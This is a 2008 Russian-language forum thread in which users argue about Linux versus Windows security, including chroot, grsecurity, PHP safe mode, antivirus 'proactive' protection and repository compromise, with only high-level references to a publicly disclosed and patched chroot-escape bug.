0 |
detgh
18-11-2008 00:09:21
Блин, что за фигня? Это было для "антипенгвин".
0 |
46469
18-11-2008 11:20:24
Винда хорошо работает.
0 |
18-11-2008 01:26:21
+1 - тоже сохранилась ещё хрюша - 3 года рабатает,грузится по 5 минут. А линь(debian forever) всё равно эффективнее работает, шустрее, домашний медиацентр+локальный сервак тока на нём и реально держать... А з игрушек - только CSS, Stalker, FEAR и Q4 играю - всё под вайном пойдёт. Только лень собраться и ВСЁ под линь перевести - ибо винда как наркотик, сложно слезть...
0 |
аццкий_йожег
18-11-2008 08:44:14
ну и дурак... у меня на одном из компов хр стоит 4 года и грузится ~20с Только лень собраться и ВСЁ под линь перевести - ибо винда как наркотик, сложно слезть...это не винда наркотик, это отсутсвие убедительных доводов линукса для того чтобы перейти на него
0 |
abadonna
18-11-2008 08:51:26
отсутсвие убедительных доводов линукса для того чтобы перейти на него Самый убедительный довод для перехода на линукс в наше время - виста.
0 |
19-11-2008 00:49:19
видимо, на ней не крутится полный серверный набор + торренты и прочее... А линь, между прочим, уже давно использую - а винду думаю оставлю только чтобы выдёргивать либы для вайна.
0 |
18-11-2008 04:22:28
бугога, а кто-то говорил что виста рулит! таки говном оказалась, да?
0 |
42399
20-11-2008 12:24:47
Рулит, если грамотно настроить
0 |
49429
20-11-2008 13:43:42
Точно. Сама всем рулит. Даже пользователю не позволяет.
0 |
Во-первых, руткиты пошли от UNIX-like систем. Во-вторых - очень хотелось бы поглядеть через сколько времени вы бы заметили присутствие зловредного кода, если бы он проник через святая святых - автообновление линукса: вам же ни антивирус ни проактивные средства не нужны. Стало быть, и искать ой как долго будете! Между прочим, это не из области фантастики, такие случаи уже бывали
0 |
Bugg
21-11-2008 11:44:40
вам же ни антивирус ни проактивные средства не нужныПроактивных средств в юникс-подобных ОС хватает. А антивирус в таком случае не защитит. Не говорите ерунды. Стало быть, и искать ой как долго будете! Между прочим, это не из области фантастики, такие случаи уже бывалиБывали и будут еще, риск есть. Но обнаружатся эти случаи быстрее, чем вы думаете. В том числе потому, что сообщество пользователей юникс-подобных ОС в процентном соотношении более образовано и практикует намеренный или случайный анализ побочных эффектов, возникающих при компрометации систем, а также использует ПО в экзотических конфигурациях, корректно работать в каждой из которых вредоносное ПО, получившее массовое распространение, просто не в состоянии.
0 |
А какие проактивные средства в линуксе есть? Честно говоря, я даже особо и не слышал о них... Разве что о парочке антируткитов... Ну, насчёт процентного соотношения - допустим, соглашусь, даже если учитывать сколько мальчуганов пересаживается на линукс не от интеллекта, а просто для того чтоб выделяться из толпы и казаться крутым. А вот с определением злополучного ПО в линуксе - этот процесс явно будет дольше, чем в винде, просто потому что в винде зловредное ПО очень быстро эволюционирует, эволюционируют и защитные механизмы. Да и опыта у людей становится больше. А вам, хоть руткиты и имели своё начало в unix-like системах - опыта как раз и не хватает. К тому же, может это покажется фантастическим, но именно наличие ваших систем внушает в пользователей ложное чуство безопасности: в линуксе-то они троянов редко увидят - вот и не парятся: поставили систему с диска, поставили автообновления и всё, успокоились. В то время, когда зловреды под винду - это уже норма, которая завтавляет пользователей думать о своей безопасности. Яркий пример: вспомните, что 95% людей умерло от чумы. Но потом она уже не донимала нас, потому что оставшиеся 5% смогли справиться с заболеванием и дать продолжение рода этому устоявшему гену. А когда европейцы высадились в Америке - 90% индейцев умерли просто заразившись привезёнными микробами из европы. Так же и в линуксе: ень вашей радости (если он настанет), когда линукс будет самой популярной системой, совпадёт с его закатом: появятся вирусы под линукс, которые смогут перемещаться с дистриба на дистриб независимо от конфигураций.
0 |
бла-бла-бла
21-11-2008 18:15:55
бла-бла-бла. Куча псевдо умных слов. Чел пытается отдельно взятые защитные механизмы распространить на все понятие безопасности. Хотел бы я посмотреть на ваши pax, grsecurity, безопасные АПИ, мандатные разграничения и прочее бла-бла, когда запущенный через десктоп-файлы или что-то подобное вирус типа GpCode элементарно зашифрует все доступные файлы в домашнем каталоге...
0 |
26444
21-11-2008 18:44:08
запущенный через десктоп-файлы или что-то подобное вирус типа GpCode элементарно зашифрует все доступные файлы в домашнем каталоге... Только для этого надо: 1) Записать этот вирус в домашний каталог 2) Установить на него атрибут "исполняемый" 3) Сделать .desktop-файл на рабочем столе. Вот только тогда он запустится. А уж если параметры монтирования ФС запрещают запускать исполняемые файлы, тогда всё вообще глухо.
0 |
А если вирус попал в систему через уязвимость в функции линукса и получил рута? А SELinux ещё не на всех десктопах стоит. Да и это тоже не панацея.
0 |
Bugg
22-11-2008 11:27:30
А если вирус попал в систему через уязвимость в функции линукса и получил рута?В смысле, через уязвимость в ядре или в демоне с правами root? Тогда система может быть и/или будет скомпрометирована. SELinux, как и другие системы контроля доступа, действительно не панацея, поскольку возможные уязвимости в ядре в большинстве случаев не прикрывает.
0 |
27645
21-11-2008 18:46:20
А в винде, к слову сказать, даже нельзя запретить скайпу кукисы воровать из кэша Firefox.
0 |
Своеобразную песочницу и для винды создать можно. И настраивать доступы к отделным каталогам тоже можно (NTFS это уже давно поддерживает). Не ожидали?
0 |
22537
22-11-2008 11:44:55
Пожалуйста поподробнее, про mandatory accses control. Его я помню в Longhorn обещали сделать, но потом решили, что это too flexible.
0 |
82296
22-11-2008 11:52:41
И настраивать доступы к отделным каталогам тоже можно (NTFS это уже давно поддерживает).Мне нужно разрешить процессу с именем skype.exe читать данный каталог, а все остальные - запретить. Как это сделать?
0 |
блил
22-11-2008 18:00:59
в "виндовс сэвен" мы реализовали эту возможность! ждите начала продаж
0 |
Средствами программы Safe’n’Sec
0 |
Bugg
22-11-2008 14:28:00
Ожидали, пробовали, плевались. Что имеется ввиду под песочницей? Каковы механизмы ее организации? Я одно время CoreForce'ом баловался. Ничего более гибкого не нашел. Но и он оказался тем еще недоделком, невзирая на авторитет CORE Security, поддержки у комьюнити не нашел и к настоящему времени, похоже, загнулся окончательно. Способ а ля "настраивать доступы к отделным каталогам" аналогом chroot не является. И уж тем более, не является аналогом FreeBSD jail'у или Grsecurity chroot'у. В юниксах тоже можно. Однако, chroot для того и предназначен, чтобы легко и просто ограничить процессу или группе процессов доступ к файлам, а не следить за правами на все объекты.
0 |
И уж тем более, не является аналогом FreeBSD jail'у или Grsecurity chroot'уОк. Тогда есть такое средство как Winjail
0 |
Bugg
26-11-2008 03:23:33
Ок. Тогда есть такое средство как Winjail In addition, WinJail announces technology named "copy on write". To work with chroot'ed application, you need to copy all system content into jails, including windows, if system drive alsio chroot'ed. But forget about this with WinJail! When accessing such chroot'ed files for the first time, it will be copied automatically into jail. To be sure the private data will not be copied, WinJail provides ability to mark certain folders as "private"; such folders will not be copied to jails. Этот winjail не имеет ичего общего с простым принципом chroot и столь же простой его реализацией. Да и не может иметь, из-за переусложненности ПО под винду.
0 |
Однако, chroot для того и предназначен, чтобы легко и просто ограничить процессу или группе процессов доступ к файлам, а не следить за правами на все объекты.Правильно ли я понимаю, что в этом случае при попытке приложения залезть туда, где ему не дано прав, записей об этом ни в каких лог-журналах не будет? Если это так - не считаете ли вы что этот минус легко перевесит плюс лёгкости и простоты? А манить простотой и лёгкостью в обмен на гибкость - это уже как-то по-майкросовтски, не находите?
0 |
Bugg
26-11-2008 03:11:15
Правильно ли я понимаю, что в этом случае при попытке приложения залезть туда, где ему не дано прав, записей об этом ни в каких лог-журналах не будет?Нет, вы понимаете неправильно. Как настроете, так и будет. Логирование активности процессов к chroot прямого отношения не имеет. Если это так - не считаете ли вы что этот минус легко перевесит плюс лёгкости и простоты?Во-первых, это не так. Во-вторых, даже если б было так, - нет, не считаю. А манить простотой и лёгкостью в обмен на гибкость - это уже как-то по-майкросовтски, не находите? Нет, не нахожу. Напротив, микрософт чаще жертвует простотой и легкостью в пользу гибкости. Безопасностью ради гибкости, кстати, тоже жертвует.
0 |
Bugg
22-11-2008 10:06:07
Чел пытается отдельно взятые защитные механизмы распространить на все понятие безопасностиНичего подобного. Хотел бы я посмотреть на ваши pax, grsecurity, безопасные АПИ, мандатные разграничения и прочее бла-бла, когда запущенный через десктоп-файлы или что-то подобное вирус типа GpCode элементарно зашифрует все доступные файлы в домашнем каталоге...Посмотрел бы и заткнулся. Grsecurity запрещает запуск исполняемых файлов и библиотек, если обычные пользователи имеют доступ на запись в такой файл, даже если раздел смонтирован без атрибута noexec. Во-вторых, любые системы мандатного доступа могут запрещать запуск исполняемых файлов. В-третьих, эти же системы могут применяться для ограничений доступа к процессам в памяти и объектам ФС для предотвращения изменения (в т.ч. шифрования) или хищения чувствительных данных.
0 |
Я рассуждаю только о том, о чём имею знания. А общаясь с вами на те темы, в которых не шарю - я подчёрпываю знаний. С каких это пор шифрование и chroot - проактиваная защита? А по поводу "я юзаю chroot и поэтому я могу не беспокоиться о безопасности" - вспомните php safe mode и сколько уже методов его обхода создано. Кстати, в гугле много чего выводится по запросу "обход chroot". Как говорится: "на всякую хитрую попу..." По поводу того, что я линукс не использую - это вы зря такие умозаключения делаете, ибо они не соответствуют действительности. Не так давно начал осваивать. Хотя, конечно, ещё мало что знаю о нём. И здесь мне действительно не хватает опыта. А вот, скажем, если будет задача: в винде находится троян использующий руткит технологию для своего сокрытия, антивирусами не обнаруживается - так я сильно сомневаюсчь, что вы сможете меня обставить. уже сегодня в некоторых, отдельно взятых ОС и дистрибутивах, средства обеспечения ИБ ушли далеко вперед, не оставляя возможности вредоносному ПО существовать там по аналогии с миром виндыДа-да-да, также, как до недавнего времени считалось, что проактивные защиты не обходятся. А помните после написания - "20 000 льё под водой" люди тоже считали, что подводные лодки - фантастика. И что в космос не полетим. Какая недальновидность с вашей стороны. И после этого вы говорите, что я не могу анализировать ситуацию. Судя по вашей логике - вы живёте сегодняшним днём, даже не пытаясь предвидеть возможные угрозы завтрашнего дня (аля: зачем мне от этого защищаться, если таких механизмов ещё не создали). на счет "с дистриба на дистриб" - вы все-таки про Gresecurity и PaX почитайтеСпасибо за инфу, почитаю. А вам по этой теме намекну на то, что java кросплатформенная. Кстати, вот почитайте: http://www.securitylab.ru/news/357052.php
0 |
Bugg
22-11-2008 10:48:23
Я рассуждаю только о том, о чём имею знания. А общаясь с вами на те темы, в которых не шарю - я подчёрпываю знаний. Нет, некоторые ваши "вопросы" звучат в форме утверждений, которые вы приводите в качестве аргументов для ОБОСНОВАНИЯ своей позиции, а не для ее выработки. В этом письме такие утверждения есть - я прокомментирую, а вы все-таки обратите внимание. С каких это пор шифрование и chroot - проактиваная защита?С самого начала. Что вы понимаете под "проактивная защита"? Я понимаю заблаговременные меры обеспечения ИБ. Пример проактивной защиты - защита слабого рантайма языка для заблаговременного предотвращения или усложнения эксплуатации его уязвимостей. chroot - тоже проактивная мера, поскольку заранее ограничивает доступ еще не скомпрометированного процесса к объектам VFS и их функциям, а в ряде случаев - накладывает дополнительные серьезные ограничения (см. Grsecurity). В противовес, реактивная защита - наложение заплаток на уязвимости, поиск вредоносного ПО по сигнатурам, выявление его активности по признакам (эвристика), аудит системных событий и т.д.. А по поводу "я юзаю chroot и поэтому я могу не беспокоиться о безопасности"Я такого не говорил и даже не думал. В моем понимании, безопасность - не результат, а процесс. Причем, меры обеспечения ИБ примерно так же соотносятся с механизмами и возможностями их обхода, как броня со снарядом - в баллистике. То есть, чаще и дольше доминирует снаряд, чем броня. Ситуацию с ИБ смягчает только то, что снаряд во многих случаях не окупается и потому не идет в дело. вспомните php safe mode и сколько уже методов его обхода создано.Safe mode в PHP с chroot не имеет ничего общего. И вы все-таки поставте себя на мое место... Вот вы сравнили chroot c safe mode, не понимая принципиальной разницы. Сравнили, чтобы дискредитировать (без злого умысла) chroot. Это сложно назвать беседой с целью почерпнуть опыт. Кстати, PHP - воплощение безответственности и реактивных мер обеспечения ИБ. От них пару лет назад даже их тогдашний безопасник ушел: надоело ему, что другие девелоперы не хотят работать даже над уже известными на тот момент уязвимостями и слабостями PHP. Кстати, в гугле много чего выводится по запросу "обход chroot". Как говорится: "на всякую хитрую попу..."Не рассуждаете, значит... Набираетесь опыта. Ну-ну. А давайте сделаем по-справедливости: вы мне назовете любой способ "обхода chroot", опишете, хотя бы в общих чертах, как он работает... То есть, сами приложите кое-какие усилия. И тогда я вам объясню, почему этот способ не работает с Grsecurity-ядрами и в OpenBSD? Труд за труд. А то мне уже лень, честно говоря, писать "простыни" в ответ на необоснованные утверждения. По поводу того, что я линукс не использую - это вы зря такие умозаключения делаете, ибо они не соответствуют действительности. Не так давно начал осваивать.В моем понимании это одно и то же. Иногда даже хуже: у тех, кто осваивает юниксы, от неопытности претензий гораздо больше, чем у тех, кто и не начинал. Но, имхо, хорошо, что все-таки осваиваете. А вот, скажем, если будет задача: в винде находится троян использующий руткит технологию для своего сокрытия, антивирусами не обнаруживается - так я сильно сомневаюсчь, что вы сможете меня обставить.Обставить в чем? В написании троянов и руткитов? :\ Это завуалированное предложение заняться фаллометрией? Да-да-да, также, как до недавнего времени считалось, что проактивные защиты не обходятся.Те, кто разбираются в вопросе, никогда так не считали. Наоборот, постоянно высказывается мысль, что безопасность (защищенность) - это не результат, а процесс. А помните после написания - "20 000 льё под водой" люди тоже считали, что подводные лодки - фантастика. И что в космос не полетим.А давайте обойдемся без посторонних аналогий? Какая недальновидность с вашей стороны.Вам опять виднее, что я думаю? Вы бы хоть читали внимательнее. Или спрашивали. Никогда я не говорил об абсолютной защищенности. Зато я говорил о кривизне линукса, о его проблемах с безопасностью, о неполноте защит против атак на указатели в том же PaX и Grsecurity и вообще в современных юникс-подобных ОС. И после этого вы говорите, что я не могу анализировать ситуацию.Говорю. А еще скажу, что невнимательно читаете, что вам пишут, и интерпретируете с апломбом на свой лад, не утруждая себя уточняющими вопросами. Судя по вашей логике - вы живёте сегодняшним днём, даже не пытаясь предвидеть возможные угрозы завтрашнего дня (аля: зачем мне от этого защищаться, если таких механизмов ещё не создали). Проблема тоько в том, что ваше представление о моей логике и собственно моя логика - две большие разницы. Вплоть до противоположностей. Спасибо за инфу, почитаю. А вам по этой теме намекну на то, что java кросплатформенная.Это к тому, что джава имеет защищенный рантайм? Медленная, эта ваша джава, кривая и раздутая, IMHO. Равно как и Ada (кривая и раздутая). Я бы хотел видеть в юниксах Oberon-подобные языки, пусть даже с рантаймом, изолированным в традиционные процессы. Но их нет. Есть только маргинальные компиляторы... Кстати, вот почитайте:http://www.securitylab.ru/news/357052.php Уже прочитал и ответил.
0 |
С самого начала. Что вы понимаете под "проактивная защита"? Я понимаю заблаговременные меры обеспечения ИБ.Давайте всё же будем оперировать устоявшимися понятиями (http://ru.wikipedia.org/wiki/Проактивная_защита). Иначе происходит подмена понятий и разговор о совершенно разных вещах. Обставить в чем? В написании троянов и руткитов?Нет, в их поиске в системе. Проблема тоько в том, что ваше представление о моей логике и собственно моя логика - две большие разницы. Вплоть до противоположностей.Как говорится: о человеке есть 3 суждения: то, как он представляет себя, как представляют его другие и кто он есть на самом деле. Так что тут нечему удивляться. А вот какая из логик ближе к тому, что есть на самом деле - это ещё вопрос Это к тому, что джава имеет защищенный рантайм?Нет: к тому, что она кросплатформенная и, следовательно, зловредный код, написаный на джаве, может "кочевать" с дистрибутива на дистрибутивSafe mode в PHP с chroot не имеет ничего общегоНу, не совсем так. Всё-таки эти оба механизма используются с целью предотвратить полный захват системы когда получен доступ к части системы А давайте сделаем по-справедливости: вы мне назовете любой способ "обхода chroot", опишете, хотя бы в общих чертах, как он работает... То есть, сами приложите кое-какие усилия. И тогда я вам объясню, почему этот способ не работает с Grsecurity-ядрами и в OpenBSD? Труд за труд. А то мне уже лень, честно говоря, писать "простыни" в ответ на необоснованные утверждения.Да, это будет честно. Ну чтож, прошу: В Linux ядре 2.6.16.11 была исправлена (http://www.opennet.ru/opennews/art.shtml?num=7392) ошибка связанная с возможностью некорректного использования злоумышленником обратного слеша в пути к файлу. Как оказалось (http://secunia.com/advisories/19869/), данную проблему можно было использовать для обхода chroot ограничений в Linux, через использования пути вида "..\" в примонтированных SMBFS/CIFS разделах (с практической точки зрения, маловероятно что кто-то использует часть SMB раздела как корень для chroot).
0 |
А антивирус в таком случае не защитит. Не говорите ерунды.Может, от того антивирус не защитит, что в линуксе в антивирусах нету всех тех средств, что есть в винде (кстати, к вопросу об инструменте и наборе инструментов)? Или может дело в том, что кое-кто не особо разбирался в современных антивирусах и поэтому не знает всех их возможностей?
0 |
Bugg
26-11-2008 03:45:59
Давайте всё же будем оперировать устоявшимися понятиями (http://ru.wikipedia.org/wiki/Проактивная_защита). Иначе происходит подмена понятий и разговор о совершенно разных вещах.Нет, такими устоявшимися понятиями мы оперировать не будем. Индустрии антивирусов выгодно называть реактивные меры проактивными, и я на эту уловку не поведусь. Вот ссылка на документ от 97 года: http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.54.5747 - рассмотрен частный случай проактивных мер. Как видите, ничего общего с отслеживанием подозрительной активности - за последним давно закреплены термины HIDS/LIDS/NIDS. Иначе происходит подмена понятий и разговор о совершенно разных вещах. Подменя понятий мне тоже не нравится. Как говорится: о человеке есть 3 суждения: то, как он представляет себя, как представляют его другие и кто он есть на самом деле. Так что тут нечему удивляться.Удивляться, действительно, нечему. Договаривать и додумывать за собеседников - очень распространный прием ведения полемики или не менее распространенная форма проявления глупости. Нет: к тому, что она кросплатформенная и, следовательно, зловредный код, написаный на джаве, может "кочевать" с дистрибутива на дистрибутивШелл-код тоже вполне себе может кочевать. Как и любой интерпретируемый код. Ну, не совсем так. Всё-таки эти оба механизма используются с целью предотвратить полный захват системы когда получен доступ к части системы После таких утверждений у меня пропадают остатки желания довести разговор до конца. По аналогии, предлагаю вам выстроить стену из соломы, ее сломать, сдуть и сжечь, а после заявить, что каменная стена стена во всем этом очень похожа на соломенную. Между safe mode и chroot существует технологическая кардинальная разница, поэтому сравнение некорректно. Да, это будет честно. Ну чтож, прошу:И что вы этим собирались доказать? Что глупость человеческая не имеет границ? Это известно. И пример с chroot с корнем на сетевом разделе - яркое тому подтверждение. Попробуйте найти пример обхода chroot в реальных ситуациях. Не найдете. Потому что примеры известны и в реальных ситуациях учитываются профессионалами при построении chroot-окружений. Может, от того антивирус не защитит, что в линуксе в антивирусах нету всех тех средств, что есть в винде (кстати, к вопросу об инструменте и наборе инструментов)? Или может дело в том, что кое-кто не особо разбирался в современных антивирусах и поэтому не знает всех их возможностей?Значит, вы утверждаете, что некий полноценный антивирус помог бы. Как? Аргументируйте. Опишите последовательность, механизм.
0 |
Нет, такими устоявшимися понятиями мы оперировать не будем. Индустрии антивирусов выгодно называть реактивные меры проактивными, и я на эту уловку не поведусь.Вы бы ещё вспомнили, что принятое направление тока отличается от направленного движения электронов. Откройте же физикам всего мира глаза! После таких утверждений у меня пропадают остатки желания довести разговор до конца.Аргументируйте. Опишите последовательность, механизм.Вы уж определитесь: хотите вы вести разговор или нет. А то что-то разкапризначились совсем: то хочу, то не хочу... Потому что примеры известны и в реальных ситуациях учитываются профессионалами при построении chroot-окружений.Другими словами, вы утверждаете, что в этой области придумать ничего нельзя для обхода защиты? А как же "безопасность - это процесс"? Значит, вы утверждаете, что некий полноценный антивирус помог бы. Как? Аргументируйте. Опишите последовательность, механизм.На сколько я знаю, внедрение в память чужого процесса возможна и в линуксе. Стало быть, если опираться на термин "проактивная защита" из ссылки, что я привёл - антивирус в линуксе, имеющий те же возможности что и в винде, помог бы По аналогии, предлагаю вам выстроить стену из соломы, ее сломать, сдуть и сжечь, а после заявить, что каменная стена стена во всем этом очень похожа на соломенную.Аналогия и здесь есть. Вспомните сказку про 3-х поросят Между safe mode и chroot существует технологическая кардинальная разница, поэтому сравнение некорректно.В таком случае, аппаратные и программные брэндмауэры также сравниваться не могут. Будем обзывать людей, сравнивающих их, глупцами?
0 |
Bugg
29-11-2008 18:13:21
Вы бы ещё вспомнили, что принятое направление тока отличается от направленного движения электронов. Откройте же физикам всего мира глаза!Причем здесь физики? Определение, данное проактивным средствам обеспечения ИБ современной индустрией антивирусного ПО, как минимум, не является универсальным и сколько-нибудь полным, и не воспринимается в качестве общепринятого ни одним неангажированным именитым экспертом в области ИБ. Будете с этим спорить? А вообще, вы сами заговорили о "проактивной защите" и сами отвергли чьи-то посторонние взгляды о ее неуязвимости. Не приводите неуместных аналогий, говорите по существу, и нам не придется спорить о понятиях. Вы уж определитесь: хотите вы вести разговор или нет. А то что-то разкапризначились совсем: то хочу, то не хочу...А не много ли вы на себя берете? Поймите, для начала, разницу между "пропадают" и "пропали". А вообще, похоже, вам просто нечего сказать по существу. Я вам указал на неправомерность аналогии, а вы перешли на личности. Будете продолжать в том же духе, я действительно перестану вам отвечать. Другими словами, вы утверждаете, что в этой области придумать ничего нельзя для обхода защиты? А как же "безопасность - это процесс"?Другими словами, я утверждаю, что ваши ссылки на гугль в качестве аргументов, якобы дискредитирующих chroot, не стоят выеденного яйца. Не более, но и не менее. Выбраться из грамотно выстроенного chroot-окружения можно либо располагая правами root (но в некоторых случаях и этого недостаточно), либо через уязвимость в ядре, либо никак. А safe mode в PHP - лишь жалкая попытка выстроить переусложненный зАмок на песке. На сколько я знаю, внедрение в память чужого процесса возможна и в линуксе. Стало быть, если опираться на термин "проактивная защита" из ссылки, что я привёл - антивирус в линуксе, имеющий те же возможности что и в винде, помог быКаким именно образом он бы помог? Уточните источник и опишите сущность угрозы, а также каковы должны быть действия антивируса. Хотя бы, в общих чертах. Аналогия и здесь есть. Вспомните сказку про 3-х поросятВы сами-то ее хорошо помните? Два поросенка наплевали на угрозу и построили себе хлипкие дома, которые волк разрушил. Третий поросенок не поленился построить дом из камня, волк его сломать не смог и был зажарен на каминном огне при попытке проникновения в дом через трубу. В этой аналогии PHP safe mode - дом из соломы, а chroot - конструктивная часть дома из камня. В таком случае, аппаратные и программные брэндмауэры также сравниваться не могут. Будем обзывать людей, сравнивающих их, глупцами?Причем здесь брандмауэры, как они могут помочь вам обосновать свою мысль об отсутствии существенной разныцы между safe mode и chroot?
0 |
Определение, данное проактивным средствам обеспечения ИБ современной индустрией антивирусного ПО, как минимум, не является универсальным и сколько-нибудь полным, и не воспринимается в качестве общепринятого ни одним неангажированным именитым экспертом в области ИБ. Будете с этим спорить?Буду. По крайней мере те специталисты в области ИБ, чьи слова мне доводилось читать/слышать, оперировали именно устоявшимся термином. А про "при чём тут физики" - очень даже при том: это было сравнение, призванное показать, что даже если сама суть слов не совсем верная - тем не менее такое словосоцетание спокойно уживается в мире и специалисты всего мира им потом оперируют. А вообще, вы сами заговорили о "проактивной защите" и сами отвергли чьи-то посторонние взгляды о ее неуязвимости.Не понял: что вы хотите этим сказать? А не много ли вы на себя берете?Думаю, самый аккурат: жёстко, но не оскорбительно Я вам указал на неправомерность аналогии, а вы перешли на личностиА я вам указал на правомерность аналогий Выбраться из грамотно выстроенного chroot-окружения можно либо располагая правами root (но в некоторых случаях и этого недостаточно), либо через уязвимость в ядреДык, про уязвимости-то у нас как раз и речь! Каким именно образом он бы помог? Уточните источник и опишите сущность угрозы, а также каковы должны быть действия антивируса. Хотя бы, в общих чертах.Коли вы были так милосердны, что поделились со мною знаниями - отвечу вам тем же: в линуксе, как и в винде, есть возможность влезать в память чужого процесса и далее от имени этого процесса проводить действия (что в конечном счёте приводит к обходу систем защиты). Для того, чтобы получить доступ к памяти чужого процесса в винде вызываются некие WinAPI-функции (некоторая их аналогия есть и в линуксе, на сколько мне известно). Антивирусное ПО подменяет обращение к таким функциям своей, попутно вытаскивая данные о процессе, которые пытаются этими функциями воспользоваться, и спрашивают пользователя где поставить запятую в предложении "казнить нельзя помиловать" В этой аналогии PHP safe mode - дом из соломы, а chroot - конструктивная часть дома из камня.Всё правильно. Как видите, общее у них есть. К тому же, была как-то статья на секлабе... что-то вроде "персональный файерволл - огненная стена или соломенная ширма?" Суть её в том, что на тот момент многие персональные файерволлы не отслеживали низкоуровневый доступ к сети. Результат: можно было создать программу, запущенную на компе пользователя и слушающую команды по любому порту. Пакет на этот порт попадал к программе прежде, чем к файерволлу, который уже после этого решал: запрещать пакет или нет. Так что, как видите, порой, от огненной стены до соломенной ширмы - всего один шаг. Это - ещё одно обоснование того, что используемые мной аналогии вполне уместны. Причем здесь брандмауэры, как они могут помочь вам обосновать свою мысль об отсутствии существенной разныцы между safe mode и chroot?Я только что это продемонстрировал. Если смотреть на эти продукты с точки зрения того, что они оба мешают получать полноценный доступ к системе, имея ограниченный - то разницы между ними (в этом смысле) особой нету
0 |
Bugg
05-12-2008 05:23:22
Буду. По крайней мере те специталисты в области ИБ, чьи слова мне доводилось читать/слышать, оперировали именно устоявшимся термином.Во-первых, вы, ничего толком не зная, по статейке в википедии решили свести изначально более широкое значение этого термина к более узкому, частному значению. Причем, к значению, надуманному индустрией антивирусов для описания свойств своих продуктов в отрыве от защиты системы в целом. И потрудитесь-ка назвать имена специалистов, которые считают, что IDS/IPS - это проактивные меры, а chroot - нет. Пока вы тычете пальцем в небо, ссылаясь на не понятно, кого, я отказываюсь продолжать спор о понятиях, который на пустом месте начали вы, не признав chroot проактивной мерой. А про "при чём тут физики" - очень даже при том: это было сравнение, призванное показать, что даже если сама суть слов не совсем верная - тем не менее такое словосоцетание спокойно уживается в мире и специалисты всего мира им потом оперируют.Вам просто нечего сказать по существу. Речь не о познании неизведанного, а о цифровых машиных, созданных человеком. Аналогия в данном случае не может быть единственным главным аргументом. А у вас - аналогия на аналогии. И начали вы с аналогии, сравнив PHP safe mode и chroot, практически поставив знак равенства между надежностью этих механизмов. Это чушь. Механизм chroot реализован в коде, изолированном от юзерленда в подсистеме ядра ОС - отдельном процессе с более высокими привилегиями. Механизм PHP safe mode реализован на языке с уязвимым рантаймом в рамках того же процесса, чьи привилегии он призван ограничивать, и даже поддерживается не всеми кусками кода (расширениями PHP) - тем самым не соблюдается главное условие для того, чтобы он хоть как-то работал. Между chroot и PHP есть существенная разница, игнорировать которую можно только в рамках безответственной полемики. Вот и все. Не понял: что вы хотите этим сказать? Именно то, что сказал. О проактивных механизмах защиты вспомнили вы. О том, что кто-то считал, будто их невозможно (?!) обойти, - тоже вы вспомнили. Мне же эти споры о понятиях не интересны и не нужны совершенно. Думаю, самый аккурат: жёстко, но не оскорбительноПри этом, совершенно безосновательно. Истолковали мои слова неверно, придрались к смыслу своего же толкования. Я вам на это указал (на разницу между "пропадает" и "пропало"), а вы даже не извинились. Или следующим комментом вы признаете, что погорячились, или я с вами перестану разговаривать. А я вам указал на правомерность аналогий Упорствовать и смайлики рисовать может любой дурак. Или вы технически грамотно обоснуете свои утверждения, или они ничего не стоят. Когда обоснуете свою позицию, тогда и аналогии будут уместны. Дык, про уязвимости-то у нас как раз и речь!Ага. Только с вашей стороны нет конкретики. При том, что я не требую исчерпывающих обоснований от вас, вы даже в общих словах chroot с PHP safe mode до сих пор не сравнили. Коли вы были так милосердны, что поделились со мною знаниями - отвечу вам тем же: в линуксе, как и в винде, есть возможность влезать в память чужого процесса и далее от имени этого процесса проводить действия (что в конечном счёте приводит к обходу систем защиты).ОК, поставлю вопрос четче: каким образом антивирус защитит от компрометации репозитария? Что, если скомпрометирован будет, например, пакет с ядром? Как антивирус это обнаружит и что сможет предпринять? Антивирусное ПО подменяет обращение к таким функциям своей, попутно вытаскивая данные о процессе, которые пытаются этими функциями воспользоваться, и спрашивают пользователя где поставить запятую в предложении "казнить нельзя помиловать".И это вы собираетесь противопоставить компрометации репозитария?? Во-первых, все это возможно в линуксе уже сегодня. Есть Systrace, есть Dazuko, есть системы MAC, выполняющие те же функции более четко и без участия пользователя. Тем не менее, все эти меры не спасут от компрометации репозитария. Вы ведь об этом изначально говорили? Вот цитата: Во-вторых - очень хотелось бы поглядеть через сколько времени вы бы заметили присутствие зловредного кода, если бы он проник через святая святых - автообновление линукса: вам же ни антивирус ни проактивные средства не нужны.Компрометация репозитария открывает дорогу к компрометации ядра системы. Антивирус не поможет. Всё правильно. Как видите, общее у них есть.У человека с амебой общего больше, чем у chroot - с PHP safe mode. К тому же, была как-то статья на секлабе... что-то вроде "персональный файерволл - огненная стена или соломенная ширма?" Суть её в том, что на тот момент многие персональные файерволлы не отслеживали низкоуровневый доступ к сети.Суть ее в том, что пользователю в винде по умолчанию слишком многое разрешено, и обеспечение безопасности в ней зачастую заключается в попытках сторонними средствами с переменным успехом запретить все лишнее. В юниксах ничего подобного нет, поскольку никто там по умолчанию с правами root не сидит. Так что, как видите, порой, от огненной стены до соломенной ширмы - всего один шаг.В винде. Да. Вижу. Или это еще одна аналогия, которая на примере винды должна доказывать ущербность умолчаний во всех юниксах? Это - ещё одно обоснование того, что используемые мной аналогии вполне уместны.Нет, не уместны. Вы пытались дискредитировать chroot на примере PHP safe mode. Теперь пытаетесь дискредитировать юниксы на пример винды. И что интересно: дискредитировать chroot на примере chroot вам не удалось. Я только что это продемонстрировал.То есть, вы считаете, что продемонстрировали правомерность аналогии между chroot и PHP safe mode на примере несовершенства виндовых файрволов? . Если смотреть на эти продукты с точки зрения того, что они оба мешают получать полноценный доступ к системе, имея ограниченный - то разницы между ними (в этом смысле) особой нетуРазницы нету только на словах. По сути, вы утверждаете, что если два инструмента предназначены для одного и того же, то "разницы между ними (в этом смысле) особой нету", и на основании утверждения их общей направленности вы делаете вывод об их общей, равной ненадежности. Это просто дешевая схоластика и ничего более. Я тоже умею обобщать. Я могу начать делать неутешительные выводы о ненадежности и уязвимости NT-систем, судя по семейству Windows 9x и на основании того, что все эти ОС выпускает мелкософт, в названиях каждой из них есть слово Windows, и каждая из них - многозадачная. Могу сказать, что от 9x до NT - один шаг. Как вы к этому отнесетесь?
0 |
А давайте сделаем по-справедливости: вы мне назовете любой способ "обхода chroot", опишете, хотя бы в общих чертах,Акцентирую ваше внимание на использовании вами слова любой И что вы этим собирались доказать? Что глупость человеческая не имеет границ? Это известно. И пример с chroot с корнем на сетевом разделе - яркое тому подтверждение.И кто после этого невнимательный? Как не вспомнить: "Когда слепые на улицах начнут учить тебя петь"
